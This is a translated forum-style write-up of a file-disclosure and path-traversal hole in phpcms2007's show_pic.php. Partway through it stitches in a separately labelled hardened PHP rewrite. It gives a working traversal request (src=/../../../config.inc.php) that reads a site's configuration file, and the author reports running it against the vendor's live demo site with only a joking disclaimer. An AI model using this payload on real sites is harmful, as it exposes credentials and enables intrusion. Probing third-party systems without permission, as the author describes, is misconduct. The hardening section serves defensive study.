In ASP the most common bug seems to be SQL injection, but in PHP, when magic_quotes_gpc is on, special characters get escaped, so even though there are plenty of SQL injection points I cannot use them. PHP does have powerful file-handling functions, though, and those let us have fun that ASP cannot offer. I think PHP's built-in file functions will get you results faster~~ Hey hey
This time I found a source code disclosure vulnerability in phpcms2007.
Once again, a tribute to Phpcms2007 for going open source!!!!
CODE: findstr /s /n /i readfile *.php >readfile.txt (I only list the useful hit)
You can search for the other file-manipulation functions yourself.
module\picture\show_pic.inc.php:8:readfile($file);
Follow up into this file and take a look, haha, it is fairly small, I like that.
CODE:
<?php
defined('IN_PHPCMS') or exit('Access Denied');
require PHPCMS_ROOT.'/module/'.$mod.'/include/common.inc.php';
isset($src) or exit;
$file = PHPCMS_ROOT.'/'.$PHPCMS['uploaddir'].'/'.$CHA['channeldir'].'/'.$MOD['upload_dir'].'/'.$src;
if(empty($PHP_REFERER) || !strpos($PHP_REFERER, $PHP_DOMAIN)) $file = PHPCMS_ROOT.'/images/error.jpg';
header("Content-type:image/pjpeg");
readfile($file);
?>
Let's go through it step by step.
First it includes the file /module/'.$mod.'/include/common.inc.php
If the variable $src is set, the upload path plus its value is assigned to the variable $file
Then it enters the if
I have not looked at the other files, so this is a guess: the if should be checking which URL the request came from, i.e. a hotlink-protection check
Then header() sends an image header
And then, nice and easy, readfile($file);
As you can see, the file type of $src is never checked, so if we submit src=*.php it gets readfile'd as well
Well, that is where the vulnerability appears
However, because of "defined('IN_PHPCMS') or exit('Access Denied');", we cannot exploit this file directly.
It can only be used through another PHP file that includes it
CODE: findstr /s /i /n show_pic.inc.php *.php >show_pic.inc.php.txt
picture\show_pic.php:4:require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php"; Take a look inside
CODE:
<?php
require "./config.inc.php";
require "../include/common.inc.php";
require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";
?>
Oh, if register_globals is on, you can use this file directly to read the target file.
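For comparison, here is how the readfile() logic in show_pic.inc.php would look once hardened against this bug. This is an added example, not PHPCMS code; UPLOAD_BASE is an assumed constant standing in for PHPCMS_ROOT/uploaddir/channeldir/upload_dir, and the hotlink check is left out for brevity.

```php
<?php
// Added example, not PHPCMS code. A hardened replacement for the readfile()
// logic in show_pic.inc.php above. UPLOAD_BASE is an assumed constant standing
// in for PHPCMS_ROOT/uploaddir/channeldir/upload_dir.
define('UPLOAD_BASE', __DIR__ . '/uploads');

// Resolve $src under $uploadBase and return the real path, or null when the
// request must be refused: wrong extension, traversal outside the base
// directory, or not a regular file.
function resolve_image(string $uploadBase, string $src): ?string
{
    // Extension whitelist first: config.inc.php and other .php files can never
    // be served, whatever the path resolves to.
    $ext = strtolower(pathinfo($src, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'gif', 'png'], true)) {
        return null;
    }
    $base = realpath($uploadBase);
    $real = realpath($uploadBase . '/' . $src);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // realpath() collapses "..", so a traversal no longer starts with the base.
    // Compare including the separator so "/uploads_old" does not match "/uploads".
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Read the parameter explicitly instead of relying on register_globals, and
// send the MIME type of the file actually served rather than a fixed header.
$src  = isset($_GET['src']) ? (string) $_GET['src'] : '';
$file = resolve_image(UPLOAD_BASE, $src);
$mime = $file === null ? '' : (string) mime_content_type($file);
if ($file === null || strpos($mime, 'image/') !== 0) {
    header('HTTP/1.1 404 Not Found');
    exit;
}
header('Content-Type: ' . $mime);
header('X-Content-Type-Options: nosniff');
readfile($file);
```

With this version the src=/../../../config.inc.php request from the walkthrough fails twice over: the .php extension is rejected before any file system access, and even a whitelisted extension cannot resolve outside UPLOAD_BASE.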
Now for the test.
The official demo site:
CODE: /picture/show_pic.php?src=/../../../config.inc.php Hey hey, read that site's configuration file
Send the request with nc,
with the GET path set to
CODE: /picture/show_pic.php?src=/../../../config.inc.php Here I used the "hedgehog" post-submission tool instead.
The test result is shown in the figure.
OK, that is the end of the analysis.
I hope you will not use this to do anything illegal, hey hey!!!